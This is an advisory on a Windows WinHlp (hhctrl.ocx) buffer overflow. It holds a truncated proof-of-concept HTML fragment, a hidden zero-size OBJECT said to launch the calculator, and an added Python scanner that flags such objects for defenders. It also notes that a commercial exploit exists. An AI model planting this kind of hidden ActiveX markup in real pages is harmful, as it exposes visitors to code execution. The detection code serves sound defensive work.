Microsoft Windows WinHlp Item Buffer Overflow Vulnerability
The following proof-of-concept code will open the calculator on the client system:
codeBase=hhctrl.ocx#Version=4,72,8252,0 height=0 id=winhelp
type=application/x-oleobject width=0><PARAM NAME="Width"
VALUE="26"><PARAM NAME="Height" VALUE="26"><PARAM NAME="Command"
NAME="Item2" VALUE="NGS Software LTD"></OBJECT>
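For defenders triaging web pages or HTML mail for this pattern, the following added example (not part of the original advisory) parses HTML, finds OBJECT elements whose codeBase loads hhctrl.ocx, and reports whether each is hidden (zero height and width) and how long its Item parameters are. The `ITEM_LIMIT` threshold, the `scan()` helper and the sample markup are assumptions constructed for illustration; the advisory does not state the length that triggers the overflow.

```python
from html.parser import HTMLParser

ITEM_LIMIT = 256  # assumed review threshold, not the real overflow length

class HHCtrlScanner(HTMLParser):
    """Collect <OBJECT> elements that load hhctrl.ocx and their Item <PARAM>s."""
    def __init__(self):
        super().__init__()
        self.findings = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # attribute names arrive lowercased
        if tag == "object":
            self._current = None
            if "hhctrl.ocx" in a.get("codebase", "").lower():
                hidden = a.get("height") == "0" and a.get("width") == "0"
                self._current = {"id": a.get("id", ""), "hidden": hidden, "items": {}}
                self.findings.append(self._current)
        elif tag == "param" and self._current is not None:
            name = a.get("name", "")
            if name.lower().startswith("item"):
                self._current["items"][name] = len(a.get("value", ""))

    def handle_endtag(self, tag):
        if tag == "object":
            self._current = None

def scan(html, item_limit=ITEM_LIMIT):
    """Return every hhctrl.ocx object found, each marked suspicious or not."""
    parser = HHCtrlScanner()
    parser.feed(html)
    parser.close()
    for f in parser.findings:
        longest = max(f["items"].values(), default=0)
        f["suspicious"] = f["hidden"] or longest > item_limit
    return parser.findings

# Constructed sample input: filler characters only, no payload.
SAMPLE = (
    '<OBJECT codeBase=hhctrl.ocx#Version=4,72,8252,0 height=0 id=winhelp '
    'type=application/x-oleobject width=0>'
    '<PARAM NAME="Item1" VALUE="' + "A" * 300 + '">'
    '<PARAM NAME="Item2" VALUE="NGS Software LTD"></OBJECT>'
    '<OBJECT codeBase=hhctrl.ocx height=20 width=20 id=toc>'
    '<PARAM NAME="Item1" VALUE="index.hhc"></OBJECT>'
)
```

Calling `scan(SAMPLE)` returns two findings; only the hidden object with the oversized Item value is marked suspicious.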
UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.